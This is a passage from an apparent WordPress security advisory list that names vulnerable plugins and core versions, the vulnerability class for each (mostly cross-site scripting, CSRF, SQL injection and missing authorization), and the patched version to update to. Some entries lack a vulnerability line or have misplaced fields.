Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Reflected Cross-Site Scripting
Patched Version: .47.1
Recommended Action: Update to version .47.1, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Responsive Photo Gallery <= 1.9.57
Patched Version: 1.9.58
Recommended Action: Update to version 1.9.58, or a newer patched version

Plugin: Easy Hide Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: BackUpWordPress

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Information Disclosure
Patched Version: 3.13
Recommended Action: Update to version 3.13, or a newer patched version

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Authenticated (Admin+) Arbitrary File Deletion
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Floating Action Button

Vulnerability: Missing Authorization
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Enhanced Text Widget

Vulnerability: Missing Authorization
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Cryptocurrency All-in-One

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Recipe Notes
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: MarketPress – WordPress eCommerce

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: BadgeOS

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Flow-Flow Social Feed Stream

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.72
Recommended Action: Update to version 3.0.72, or a newer patched version

Plugin: Order Delivery Date for WP e-Commerce

Plugin: Zephyr Project Manager

Vulnerability: Missing Authorization to Cross-Site Scripting
Patched Version: 3.2.55
Recommended Action: Update to version 3.2.55, or a newer patched version

Plugin: uncode-core

Vulnerability: Authenticated (Subscriber+) Arbitrary File Deletion
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: Save as Image Plugin by Pdfcrowd

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 2.16.1
Recommended Action: Update to version 2.16.1, or a newer patched version

Plugin: Events Manager Pro

Vulnerability: Unauthenticated CSV Injection
Patched Version: 2.6.7.2
Recommended Action: Update to version 2.6.7.2, or a newer patched version

Plugin: BestWebSoft's Twitter

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Custom Post Type Relations

Plugin: Wbcom Designs – BuddyPress Member Reviews

Vulnerability: Arbitrary Plugin Installation, Activation and Deactivation
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Login Configurator

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Flyzoo Chat

Plugin: WPDating

Vulnerability: SQL Injection
Patched Version: 7.4.1
Recommended Action: Update to version 7.4.1, or a newer patched version

Plugin: Post to CSV by BestWebSoft

Vulnerability: Authenticated (Author+) CSV Injection
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: Email Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 20.13.7
Recommended Action: Update to version 20.13.7, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Smash Balloon Social Post Feed – Simple Social Feeds for WordPress

Vulnerability: Arbitrary Plugin Settings Update to Stored Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: WPForms Google Sheet Connector Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Sticky Ad Bar Plugin

Plugin: Cost Calculator

Plugin: Admin Word Count Column

Vulnerability: Unauthenticated Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Field Template

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.26
Recommended Action: Update to version 4.3.26, or a newer patched version

Plugin: Asset CleanUp: Page Speed Booster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.8.5
Recommended Action: Update to version 1.3.8.5, or a newer patched version

Plugin: Lazyest Gallery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.21
Recommended Action: Update to version 1.1.21, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Cross-Site Scripting
Patched Version: 4.16.4
Recommended Action: Update to version 4.16.4, or a newer patched version

Plugin: Mail Subscribe List

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: TK Google Fonts GDPR Compliant

Vulnerability: Missing Authorization to Font Addition
Patched Version: 2.2.12
Recommended Action: Update to version 2.2.12, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.13.54
Recommended Action: Update to version 7.13.54, or a newer patched version

Plugin: Scheduled Announcements Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery

Vulnerability: Missing Authorization in pgc_sgb_action_wizard
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Word Search Puzzles game

Plugin: Yandex.News Feed by Teplitsa

Plugin: Backup and Restore WordPress – Backup Plugin

Vulnerability: Authorization Bypass
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Cross-Site Request Forgery via multiple AJAX actions
Patched Version: 2.9.32
Recommended Action: Update to version 2.9.32, or a newer patched version

Plugin: Arconix Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: MailerLite – WooCommerce integration

Vulnerability: Missing Authorization via Multiple Functions
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Cross-Site Request Forgery to Settings/Options Update
Patched Version: 6.10.24
Recommended Action: Update to version 6.10.24, or a newer patched version

Plugin: Robokassa payment gateway for Woocommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: my-category-order

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.4.2
Recommended Action: Update to version 4.4.2, or a newer patched version

Plugin: Ultimate Maps by Supsystic

Vulnerability: Authenticated SQL Injection
Patched Version: 1.1.17
Recommended Action: Update to version 1.1.17, or a newer patched version

Plugin: SodaHead Polls

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Plugin for Google Reviews

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Include Me

Vulnerability: Local File Inclusion leading to Authenticated Remote Code Execution
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: HTTP Headers

Vulnerability: Authenticated(Administrator+) Remote Code Execution
Patched Version: 1.18.11
Recommended Action: Update to version 1.18.11, or a newer patched version

Plugin: Swifty Page Manager

Plugin: WP CSV

Plugin: WP User Profile Avatar

Vulnerability: Authenticated (Author+) Insecure Direct Object Reference to Avatar Deletion/Update
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_row
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.17
Recommended Action: Update to version 1.3.17, or a newer patched version

Plugin: ElementsKit Elementor addons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: BuddyMeet

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Replace Word

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Category slider for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Simple Image Popup

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: ALD – Dropshipping and Fulfillment for AliExpress and WooCommerce

Vulnerability: Missing Authorization to Order Information Disclosure
Patched Version: 1.0.22
Recommended Action: Update to version 1.0.22, or a newer patched version

Plugin: Real3D Flipbook

Vulnerability: Reflected Cross-Site Scripting via bookId parameter
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Role Based Pricing for WooCommerce

Vulnerability: Missing Authorization to PHAR Deserialization
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Duplicate Page and Post

Vulnerability: SQL Injection
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Count per Day

Vulnerability: Path Disclosure and Denial of Service
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Jigoshop – Store Toolkit

Vulnerability: Missing Authorization Checks
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Disqus Conditional Load

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings.
Patched Version: 11.1.2
Recommended Action: Update to version 11.1.2, or a newer patched version

Plugin: MyCryptoCheckout – Bitcoin, Ethereum, and 100+ altcoins for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via url
Patched Version: 2.124
Recommended Action: Update to version 2.124, or a newer patched version

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: WordPress Share Buttons Plugin – AddThis

Vulnerability: Cross-Site Scripting
Patched Version: 5.0.13
Recommended Action: Update to version 5.0.13, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 13.2.11
Recommended Action: Update to version 13.2.11, or a newer patched version

Plugin: WP Shortcode by MyThemeShop

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.17
Recommended Action: Update to version 1.4.17, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Cross-Site Request Forgery via ‘regenerateSitemaps’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.24
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.24, 3.8.24, 3.9.22, 4.0.21, 4.1.21, 4.2.18, 4.3.14, 4.4.13, 4.5.12, 4.6.9, 4.7.8, 4.8.4, 4.9.1

Plugin: Easy Form by AYS – Form Builder Plugin for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Cookie banner plugin for WordPress – Cookiebot CMP by Usercentrics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: Cron Setup and Monitor – Get URL Cron

Vulnerability: Missing Authorization via geturlcron_action_handle
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: ThirstyAffiliates – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Subscriber+ Arbitrary Affiliate Links Creation
Patched Version: 3.10.5
Recommended Action: Update to version 3.10.5, or a newer patched version

Plugin: WP Accessibility

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected Cross-Site Scripting via keyword and ep_filter_date
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: LWS Hide Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Universal Star Rating

Plugin: Qubely – Advanced Gutenberg Blocks

Vulnerability: Missing Authorization
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: add2fav

Plugin: The WP Remote WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.65
Recommended Action: Update to version 4.65, or a newer patched version

Plugin: Flickr Justified Gallery

Vulnerability: Cross-Site Request Forgery via fjgwpp_settings()
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.9
Recommended Action: Update to version 0.9.9, or a newer patched version

Plugin: Resize at Upload Plus

Core: WordPress

Vulnerability: Open Redirect in Admin Dashboard
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[more_languages]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated Local File Inclusion
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: WP Spell Check

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.1.10
Recommended Action: Update to version 7.1.10, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Authenticated (Administrator)+ SQL Injection
Patched Version: 2.7.9.4
Recommended Action: Update to version 2.7.9.4, or a newer patched version

Plugin: Wufoo Shortcode

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting via Shortcodes
Patched Version: 1.52
Recommended Action: Update to version 1.52, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Authenticated Information Disclosure
Patched Version: 5.12.1
Recommended Action: Update to version 5.12.1, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.11
Recommended Action: Update to version 1.9.11, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.7.29
Recommended Action: Update to version 2.7.29, or a newer patched version

Plugin: WordPress File Monitor

Plugin: افزونه پیامک ووکامرس Persian WooCommerce SMS

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: ActivityPub

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via User Metadata
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Mistape

Vulnerability: Backdoor
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Additional Variation Images Gallery for WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.29
Recommended Action: Update to version 1.2.29, or a newer patched version

Plugin: User Photo

Vulnerability: Arbitrary File Upload
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: WP Concours

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.6
Recommended Action: Update to version 4.3.6, or a newer patched version

Plugin: Two Factor Authentication

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Frontend Uploader

Plugin: what3words Address Field

Vulnerability: Authenticated (Administrator+) Sensitive Information Exposure in class-w3w-autosuggest-public.php
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Bootstrap Shortcodes

Plugin: Worthy – VG WORT Integration für WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0-0cde1c2
Recommended Action: Update to version 1.7.0-0cde1c2, or a newer patched version

Plugin: Advanced Social Pixel

Plugin: TM WooCommerce Compare & Wishlist

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.8.11
Recommended Action: Update to version 2.8.11, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.6.15
Recommended Action: Update to version 6.6.15, or a newer patched version

Plugin: Email posts to subscribers

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Martins Free And Easy SEO BackLink Link Building Network, Improve Rankings And Traffic

Vulnerability: Reflected Cross-Site Scripting via _wpnonce
Patched Version: 1.2.30
Recommended Action: Update to version 1.2.30, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Unauthenticated Arbitrary Nonce Generation
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Subscriber by BestWebSoft

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: User Activity Log

Vulnerability: IP Address Spoofing
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Authenticated PHP Object Injection
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Getwid – Gutenberg Blocks

Vulnerability: Missing Authorization to Recaptcha API Key Modification
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Mail Control – Email Customizer, SMTP Deliverability, logging, open and click Tracking

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 0.3.2
Recommended Action: Update to version 0.3.2, or a newer patched version

Plugin: Translate Multilingual sites – TranslatePress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: SQL Injection
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated Email Address Disclosure
Patched Version: 13.1.0.7
Recommended Action: Update to version 13.1.0.7, or a newer patched version

Plugin: Cost Calculator

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 1.6.6.1
Recommended Action: Update to version 1.6.6.1, or a newer patched version

Plugin: wpDataTables (Premium)

Vulnerability: SQL Injection
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Ultimate Noindex Nofollow Tool II

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: SpiderVPlayer

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: GS Insever Portfolio

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Simple Membership

Vulnerability: Authenticated (Contributor+) Cross Site Scripting via shortcode
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: Export WP Page to Static HTML/CSS

Vulnerability: Cross-Site Request Forgery via Multiple AJAX Actions
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Advanced Custom Fields Pro

Vulnerability: 6.1.7
Patched Version: 6.1.8
Recommended Action: Update to version 6.1.8, or a newer patched version

Plugin: HDW Player Plugin (Video Player & Video Gallery)

Plugin: Pop ups, WordPress Exit Intent Popup, Email Pop Up, Lightbox Pop Up, Spin the Wheel, Contact Form Builder – Poptin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: SlideOnline

Plugin: WhatsApp Share Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Booking Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Dynamic Content for Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.12.5
Recommended Action: Update to version 2.12.5, or a newer patched version

Plugin: Chat Widget: Customer Support Button with SMS Call Button, Click to Chat Messenger, Live Chat Support Chat Button – Bit Assist

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Product Filter by WBW

Vulnerability: Missing Authorization via getListForTbl
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: MDTF – Meta Data and Taxonomies Filter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Remove slug from custom post type

Plugin: IBS Mappro

Vulnerability: Directory Traversal
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: Kodex Posts likes

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Simple Page Ordering

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 3.39
Recommended Action: Update to version 3.39, or a newer patched version

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation

Vulnerability: Unprotected REST-API Endpoints
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Tatsu

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 3.3.13
Recommended Action: Update to version 3.3.13, or a newer patched version

Plugin: Email Users

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.8.4
Recommended Action: Update to version 4.8.4, or a newer patched version

Plugin: WooCommerce

Vulnerability: Self-Reflected Cross-Site Scripting
Patched Version: 2.0.13
Recommended Action: Update to version 2.0.13, or a newer patched version

Plugin: Carrrot

Plugin: iPages Flipbook For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Code Snippets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.14.3
Recommended Action: Update to version 2.14.3, or a newer patched version

Plugin: LayerSlider

Vulnerability: Path Traversal
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: ZX_CSV Upload

Plugin: WPS Hide Login

Vulnerability: Hidden Login Page Location Disclosure
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Web Stories

Vulnerability: Server Side Request Forgery
Patched Version: 1.25.0
Recommended Action: Update to version 1.25.0, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.7
Recommended Action: Update to version 6.8.7, or a newer patched version

Plugin: PHP Event Calendar for WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Child Theme Creator by Orbisius

Vulnerability: Cross-Site Request Forgery to Arbitrary File Modification and Creation
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.7.2
